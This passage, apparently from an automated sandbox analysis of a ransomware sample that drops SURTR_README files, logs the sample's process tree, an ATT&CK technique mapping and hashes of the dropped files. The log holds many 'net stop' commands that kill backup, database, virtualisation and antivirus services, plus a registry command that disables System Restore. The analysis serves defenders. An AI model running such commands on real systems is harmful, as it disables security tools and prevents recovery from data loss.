        net stop "VeeamHvIntegrationSvc"
        5⤵
        
        PID:1688
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"
      4⤵
      PID:3588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"
  2⤵
  PID:4352
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PROFXENGAGEMENT"
    3⤵
    PID:1028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"
      4⤵
      PID:4740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
  2⤵
  PID:956
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SBSMONITORING"
    3⤵
    PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
  2⤵
  PID:5108
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SHAREPOINT"
    3⤵
    PID:1824
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"
      4⤵
      PID:224
    - - C:\Windows\system32\net.exe
        
        net stop "SQLAgent$CITRIX_METAFRAME"
        5⤵
        
        PID:1824
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"
        6⤵
        
        PID:5108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
  2⤵
  PID:1012
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SQL_2008"
    3⤵
    PID:1864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
      4⤵
      PID:2460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
  2⤵
  PID:4460
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SYSTEM_BGC"
    3⤵
    PID:4488
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
      4⤵
      PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
  2⤵
  PID:1264
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$TPS"
    3⤵
    PID:4392
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$TPS"
      4⤵
      PID:4276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
  2⤵
  PID:3280
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$TPSAMA"
    3⤵
    PID:4628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
      4⤵
      PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
  2⤵
  PID:3412
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2008R2"
    3⤵
    PID:3224
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
      4⤵
      PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
  2⤵
  PID:3872
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$VEEAMSQL2012"
    3⤵
    PID:3900
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
      4⤵
      PID:4972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
  2⤵
  PID:1740
- - C:\Windows\system32\net.exe
    net stop "SQLBrowser"
    3⤵
    PID:2032
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLBrowser"
      4⤵
      PID:3784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
  2⤵
  PID:2020
- - C:\Windows\system32\net.exe
    net stop "SQLSafeOLRService"
    3⤵
    PID:4080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLSafeOLRService"
      4⤵
      PID:2560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
  2⤵
  PID:3152
- - C:\Windows\system32\net.exe
    net stop "SQLSERVERAGENT"
    3⤵
    PID:4364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLSERVERAGENT"
      4⤵
      PID:3920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
  2⤵
  PID:4996
- - C:\Windows\system32\net.exe
    net stop "SQLTELEMETRY"
    3⤵
    PID:2548
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLTELEMETRY"
      4⤵
      PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
  2⤵
  PID:3992
- - C:\Windows\system32\net.exe
    net stop "SQLTELEMETRY$ECWDB2"
    3⤵
    PID:4640
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
      4⤵
      PID:1960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
  2⤵
  PID:2188
- - C:\Windows\system32\net.exe
    net stop "SQLWriter"
    3⤵
    PID:2472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLWriter"
      4⤵
      PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
  2⤵
  PID:2372
- - C:\Windows\system32\net.exe
    net stop "SstpSvc"
    3⤵
    PID:5044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SstpSvc"
      4⤵
      PID:1056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
  2⤵
  PID:4836
- - C:\Windows\system32\net.exe
    net stop "svcGenericHost"
    3⤵
    PID:1472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "svcGenericHost"
      4⤵
      PID:2360
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "tmlisten"
  2⤵
  PID:3204
- - C:\Windows\system32\net.exe
    net stop "tmlisten"
    3⤵
    PID:2376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "tmlisten"
      4⤵
      PID:3668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "TrueKey"
  2⤵
  PID:440
- - C:\Windows\system32\net.exe
    net stop "TrueKey"
    3⤵
    PID:1068
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "TrueKey"
      4⤵
      PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
  2⤵
  PID:3528
- - C:\Windows\system32\net.exe
    net stop "UI0Detect"
    3⤵
    PID:2676
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "UI0Detect"
      4⤵
      PID:1480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
  2⤵
  PID:3944
- - C:\Windows\system32\net.exe
    net stop "VeeamBackupSvc"
    3⤵
    PID:4884
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamBackupSvc"
      4⤵
      PID:3504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
  2⤵
  PID:2700
- - C:\Windows\system32\net.exe
    net stop "VeeamBrokerSvc"
    3⤵
    PID:4844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamBrokerSvc"
      4⤵
      PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"
  2⤵
  PID:1516
- - C:\Windows\system32\net.exe
    net stop "VeeamCatalogSvc"
    3⤵
    PID:4516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamCatalogSvc"
      4⤵
      PID:612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"
  2⤵
  PID:3732
- - C:\Windows\system32\net.exe
    net stop "VeeamCloudSvc"
    3⤵
    PID:760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamCloudSvc"
      4⤵
      PID:424
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"
  2⤵
  PID:4144
- - C:\Windows\system32\net.exe
    net stop "VeeamDeploymentService"
    3⤵
    PID:4800
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamDeploymentService"
      4⤵
      PID:812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"
  2⤵
  PID:4024
- - C:\Windows\system32\net.exe
    net stop "VeeamDeploySvc"
    3⤵
    PID:1692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamDeploySvc"
      4⤵
      PID:4212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"
  2⤵
  PID:4772
- - C:\Windows\system32\net.exe
    net stop "VeeamEnterpriseManagerSvc"
    3⤵
    PID:2564
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"
      4⤵
      PID:3052
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "vmicrdv"
        5⤵
        
        PID:2564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"
  2⤵
  PID:2012
- - C:\Windows\system32\net.exe
    net stop "VeeamMountSvc"
    3⤵
    PID:4004
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamMountSvc"
      4⤵
      PID:4036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"
  2⤵
  PID:2400
- - C:\Windows\system32\net.exe
    net stop "VeeamNFSSvc"
    3⤵
    PID:4936
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamNFSSvc"
      4⤵
      PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"
  2⤵
  PID:4684
- - C:\Windows\system32\net.exe
    net stop "VeeamRESTSvc"
    3⤵
    PID:3924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamRESTSvc"
      4⤵
      PID:3932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"
  2⤵
  PID:1560
- - C:\Windows\system32\net.exe
    net stop "VeeamTransportSvc"
    3⤵
    PID:720
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VeeamTransportSvc"
      4⤵
      PID:4764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "W3Svc"
  2⤵
  PID:3640
- - C:\Windows\system32\net.exe
    net stop "W3Svc"
    3⤵
    PID:4252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "W3Svc"
      4⤵
      PID:4244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "wbengine"
  2⤵
  PID:4692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WRSVC"
  2⤵
  PID:1844
- - C:\Windows\system32\net.exe
    net stop "WRSVC"
    3⤵
    PID:1400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WRSVC"
      4⤵
      PID:2128
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"
  2⤵
  PID:4464
- - C:\Windows\system32\net.exe
    net stop "MSSQL$VEEAMSQL2008R2"
    3⤵
    PID:288
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"
      4⤵
      PID:1124
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
  2⤵
  PID:1272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"
  2⤵
  PID:3464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "swi_update"
  2⤵
  PID:4740
- - C:\Windows\system32\net.exe
    net stop "swi_update"
    3⤵
    PID:1028
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "swi_update"
      4⤵
      PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"
  2⤵
  PID:3988
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$CXDB"
    3⤵
    PID:4416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$CXDB"
      4⤵
      PID:956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"
  2⤵
  PID:224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQL Backups"
  2⤵
  PID:2460
- - C:\Windows\system32\net.exe
    net stop "SQL Backups"
    3⤵
    PID:1864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQL Backups"
      4⤵
      PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"
  2⤵
  PID:1208
- - C:\Windows\system32\net.exe
    net stop "MSSQL$PROD"
    3⤵
    PID:4488
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$PROD"
      4⤵
      PID:4460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"
  2⤵
  PID:4496
- - C:\Windows\system32\net.exe
    net stop "Zoolz 2 Service"
    3⤵
    PID:4616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Zoolz 2 Service"
      4⤵
      PID:3572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"
  2⤵
  PID:3308
- - C:\Windows\system32\net.exe
    net stop "MSSQLServerADHelper"
    3⤵
    PID:2116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQLServerADHelper"
      4⤵
      PID:3420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"
  2⤵
  PID:836
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$PROD"
    3⤵
    PID:3436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$PROD"
      4⤵
      PID:1504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"
  2⤵
  PID:4164
- - C:\Windows\system32\net.exe
    net stop "msftesql$PROD"
    3⤵
    PID:4188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "msftesql$PROD"
      4⤵
      PID:1276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"
  2⤵
  PID:1288
- - C:\Windows\system32\net.exe
    net stop "NetMsmqActivator"
    3⤵
    PID:1440
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "NetMsmqActivator"
      4⤵
      PID:4852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "EhttpSrv"
  2⤵
  PID:4968
- - C:\Windows\system32\net.exe
    net stop "EhttpSrv"
    3⤵
    PID:2244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "EhttpSrv"
      4⤵
      PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ekrn"
  2⤵
  PID:1876
- - C:\Windows\system32\net.exe
    net stop "ekrn"
    3⤵
    PID:1512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ekrn"
      4⤵
      PID:4340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "ESHASRV"
  2⤵
  PID:2580
- - C:\Windows\system32\net.exe
    net stop "ESHASRV"
    3⤵
    PID:1728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "ESHASRV"
      4⤵
      PID:3880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"
  2⤵
  PID:1296
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SOPHOS"
    3⤵
    PID:1340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SOPHOS"
      4⤵
      PID:4916
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"
  2⤵
  PID:4612
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SOPHOS"
    3⤵
    PID:2740
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SOPHOS"
      4⤵
      PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "AVP"
  2⤵
  PID:2988
- - C:\Windows\system32\net.exe
    net stop "AVP"
    3⤵
    PID:1788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "AVP"
      4⤵
      PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "klnagent"
  2⤵
  PID:3672
- - C:\Windows\system32\net.exe
    net stop "klnagent"
    3⤵
    PID:3380
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "klnagent"
      4⤵
      PID:4976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"
  2⤵
  PID:2016
- - C:\Windows\system32\net.exe
    net stop "MSSQL$SQLEXPRESS"
    3⤵
    PID:4336
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"
      4⤵
      PID:3416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"
  2⤵
  PID:2344
- - C:\Windows\system32\net.exe
    net stop "SQLAgent$SQLEXPRESS"
    3⤵
    PID:2952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"
      4⤵
      PID:3496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "wbengine"
  2⤵
  PID:1348
- - C:\Windows\system32\net.exe
    net stop "wbengine"
    3⤵
    PID:2232
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "wbengine"
      4⤵
      PID:3372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "HvHost"
  2⤵
  PID:1156
- - C:\Windows\system32\net.exe
    net stop "HvHost"
    3⤵
    PID:4864
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "HvHost"
      4⤵
      PID:2260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"
  2⤵
  PID:752
- - C:\Windows\system32\net.exe
    net stop "vmickvpexchange"
    3⤵
    PID:4600
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmickvpexchange"
      4⤵
      PID:4876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"
  2⤵
  PID:4064
- - C:\Windows\system32\net.exe
    net stop "vmicguestinterface"
    3⤵
    PID:4844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicguestinterface"
      4⤵
      PID:2700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicshutdown"
  2⤵
  PID:612
- - C:\Windows\system32\net.exe
    net stop "vmicshutdown"
    3⤵
    PID:4516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicshutdown"
      4⤵
      PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"
  2⤵
  PID:424
- - C:\Windows\system32\net.exe
    net stop "vmicheartbeat"
    3⤵
    PID:760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicheartbeat"
      4⤵
      PID:3732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmcompute"
  2⤵
  PID:812
- - C:\Windows\system32\net.exe
    net stop "vmcompute"
    3⤵
    PID:4800
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmcompute"
      4⤵
      PID:4144
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicvmsession"
  2⤵
  PID:3368
- - C:\Windows\system32\net.exe
    net stop "vmicvmsession"
    3⤵
    PID:5092
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicvmsession"
      4⤵
      PID:4452
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicrdv"
  2⤵
  PID:4256
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmictimesync"
  2⤵
  PID:4772
- - C:\Windows\system32\net.exe
    net stop "vmictimesync"
    3⤵
    PID:2920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmictimesync"
      4⤵
      PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "vmicvss"
  2⤵
  PID:3320
- - C:\Windows\system32\net.exe
    net stop "vmicvss"
    3⤵
    PID:4752
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "vmicvss"
      4⤵
      PID:616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMAuthdService"
  2⤵
  PID:5100
- - C:\Windows\system32\net.exe
    net stop "VMAuthdService"
    3⤵
    PID:4592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMAuthdService"
      4⤵
      PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"
  2⤵
  PID:1780
- - C:\Windows\system32\net.exe
    net stop "VMnetDHCP"
    3⤵
    PID:3592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMnetDHCP"
      4⤵
      PID:1320
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"
  2⤵
  PID:4408
- - C:\Windows\system32\net.exe
    net stop "VMware NAT Service"
    3⤵
    PID:1632
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMware NAT Service"
      4⤵
      PID:4020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"
  2⤵
  PID:4776
- - C:\Windows\system32\net.exe
    net stop "VMUSBArbService"
    3⤵
    PID:296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMUSBArbService"
      4⤵
      PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "VMwareHostd"
  2⤵
  PID:4268
- - C:\Windows\system32\net.exe
    net stop "VMwareHostd"
    3⤵
    PID:784
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "VMwareHostd"
      4⤵
      PID:4676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sense"
  2⤵
  PID:5028
- - C:\Windows\system32\net.exe
    net stop "Sense"
    3⤵
    PID:1680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sense"
      4⤵
      PID:272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WdNisSvc"
  2⤵
  PID:520
- - C:\Windows\system32\net.exe
    net stop "WdNisSvc"
    3⤵
    PID:4044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WdNisSvc"
      4⤵
      PID:268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "WinDefend"
  2⤵
  PID:1936
- - C:\Windows\system32\net.exe
    net stop "WinDefend"
    3⤵
    PID:2000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WinDefend"
      4⤵
      PID:4512

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2364

C:\Windows\system32\net.exe
net stop "Sophos Web Control Service"
1⤵
PID:876
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "Sophos Web Control Service"
  2⤵
  PID:4732

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
1⤵
PID:4036

C:\Windows\system32\net.exe
net stop "MsDtsServer100"
1⤵
PID:1276
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "MsDtsServer100"
  2⤵
  PID:2244

C:\Windows\system32\net.exe
net stop "MSExchangeIS"
1⤵
PID:1788
- C:\Windows\system32\net1.exe
  C:\Windows\system32\net1 stop "MSExchangeIS"
  2⤵
  PID:3492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "POP3Svc"
1⤵
PID:2160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "RESvc"
1⤵
PID:1724

C:\Windows\system32\net.exe
net stop "vmicrdv"
1⤵
PID:3052

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

T1053

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Filesize
8KB

MD5
5566c56be83b27012d42325ee3d3d404

SHA1
c7a16ebe22307f5b4c296d8f4d1bdb5d65b8d8f7

SHA256
ce907f0d152bbf6df0e77db34ebb8c3b9a20c0736485ebd35e2473c3beecdbce

SHA512
d124ac4bfee087da71996032f2ca23467d5848336b606e3a18724f94fc273371e7fdf085049ca449e5a28c3a6d6966e2ca99b7bb4f9e8ffc258c2f2baece9ab3

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txt

Filesize
614B

MD5
d9188ea589f412fb797b5a00be60eb68

SHA1
b165b3d4853340af42f2d427cf30ee5746b784a4

SHA256
66bbc41ccccc8144174c947b94a7e8c3f1a2d868565087b938cfd06850e25f0f

SHA512
9f91f964ec3b9b6c46781475d266f6cf920c302f956a50b0f1f06a26068f7e67212a52adc8924428375273af9098e4f04add3f5d9563b0c416286356e70f30a9

Download Submit
C:\ProgramData\Service\ID_DATA.surt

Filesize
14B

MD5
20cc31eb6275907d0c1db1846f36e099

SHA1
715add972762af3a7553c01db6aad1f8cff106f3

SHA256
99091368a06d68a6967000680453f7822970fec08099eb19bb5197d8e753ebe1

SHA512
a1c1624873ab4ec4f9f74af49acf54e0522e814f58c777b6ac97972e292a7b2f03e2bc1ebaba5d1d9ce5a08eeeb6fde7c32f440fc47c8dbc2a8d38077248e16d

Download Submit
C:\ProgramData\Service\Private_DATA.surt

Filesize
1KB

MD5
ad66d0a80756fcaf6b989eb1436000a7

SHA1
bb89f2ea642e0c21b9273affd5f49543b7a8750f

SHA256
ee441bf50644039141f18bc49b431339a249f665cbc9b5c7369879d2c7e86ab8

SHA512
e09828b8104e1bc6fc55d32555f2b0e1517dccb679d50a3b36d3409c4b848f5f73847b71959b093dc057a866cd3287b740ce5379a75d2c256a27cebebd0f1b6c

Download Submit
C:\ProgramData\Service\Public_DATA.surt

Filesize
204B

MD5
07406a5baeb53e09657932422fd05cba

SHA1
b184deb7bdd195a8221c07aa745a3db17660509f

SHA256
043c7a957496bc8a16e950456a63d5bed62d407f65ca12b90ffa3bdea61d4c4f

SHA512
5f1066d973ed6cc52a5fcecefd4c5030afcc5abad3272d34ef1d1d09fa2eb1cf3bd325d220adaf734975f4a9c266dff83b4cf78c9fab944a11cab01dc4906d9c

Download Submit
C:\ProgramData\Service\SURTR_README.hta

Filesize
8KB

MD5
5566c56be83b27012d42325ee3d3d404

SHA1
c7a16ebe22307f5b4c296d8f4d1bdb5d65b8d8f7

SHA256
ce907f0d152bbf6df0e77db34ebb8c3b9a20c0736485ebd35e2473c3beecdbce

SHA512
d124ac4bfee087da71996032f2ca23467d5848336b606e3a18724f94fc273371e7fdf085049ca449e5a28c3a6d6966e2ca99b7bb4f9e8ffc258c2f2baece9ab3

Download Submit
C:\ProgramData\Service\SURTR_README.txt

Filesize
614B

MD5
